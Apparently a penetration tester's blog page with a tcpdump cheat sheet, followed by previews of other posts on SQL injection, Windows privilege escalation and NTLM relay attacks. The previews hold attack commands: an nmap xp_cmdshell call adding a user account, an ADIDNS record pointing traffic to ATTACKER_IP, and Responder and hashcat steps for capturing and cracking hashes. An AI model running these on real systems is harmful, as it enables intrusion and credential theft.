Skip to main content

TCPDUMP Cheatsheet

 


TCPDUMP Usage

tcpdump is by default installed on most of the linux machine, you can run it by "sudo tcpdump"

Protocol: ether, ip, ip6, arp, rarp, tcp, udp: protocol type
Type:
host [host]: Only give me packets to or from that host
net [network]: Only packets for a given network
port [portnum]: Only packets for that port
portrange [start-end]: Only packets in that range of ports

Direction:
src: Only give me packets from that host or port
dst : Only give me packets to that host

• Use "and" or "or" to combine these together
• Use "not" to negate

-n Host IP addresses and port numbers instead of names
-i interface Sniff on a particular interface (-D lists interfaces)
-v Be verbose (show TTL, IP ID, Total Length, IP options, and so on)
-w Dump packets to a file (use -r to read file later)
-x Print hex
-X Print hex and ASCII
-A Print ASCII
#View the traffic from all interfaces on host 10.10.10.10 or port 443
sudo tcpdump -s 0 -i any host 10.10.10.10 or port 443

#Read packets while saving the data

sudo tcpdump -w - | tee file.pcap | tcpdump -r -

#Show TCP packets against target 10.10.10.10 in ASCII and Hex
tcpdump -nnX tcp and dst 10.10.10.10

#Show all UDP packets from 10.10.10.10
tcpdump -nn udp and src 10.10.10.10

#Show all TCP port 80 packets going to or from host 10.10.10.10
tcpdump -nn tcp and port 80 and host 10.10.10.10 tcpdump -na -i nurx0 -G 20 -W 1 -w cap.pcap #Capture Everything Except a port or host tcpdump -i any port not 22 and host 10.10.10.10 -vv

 

 

 

Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Relay Attacks

Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/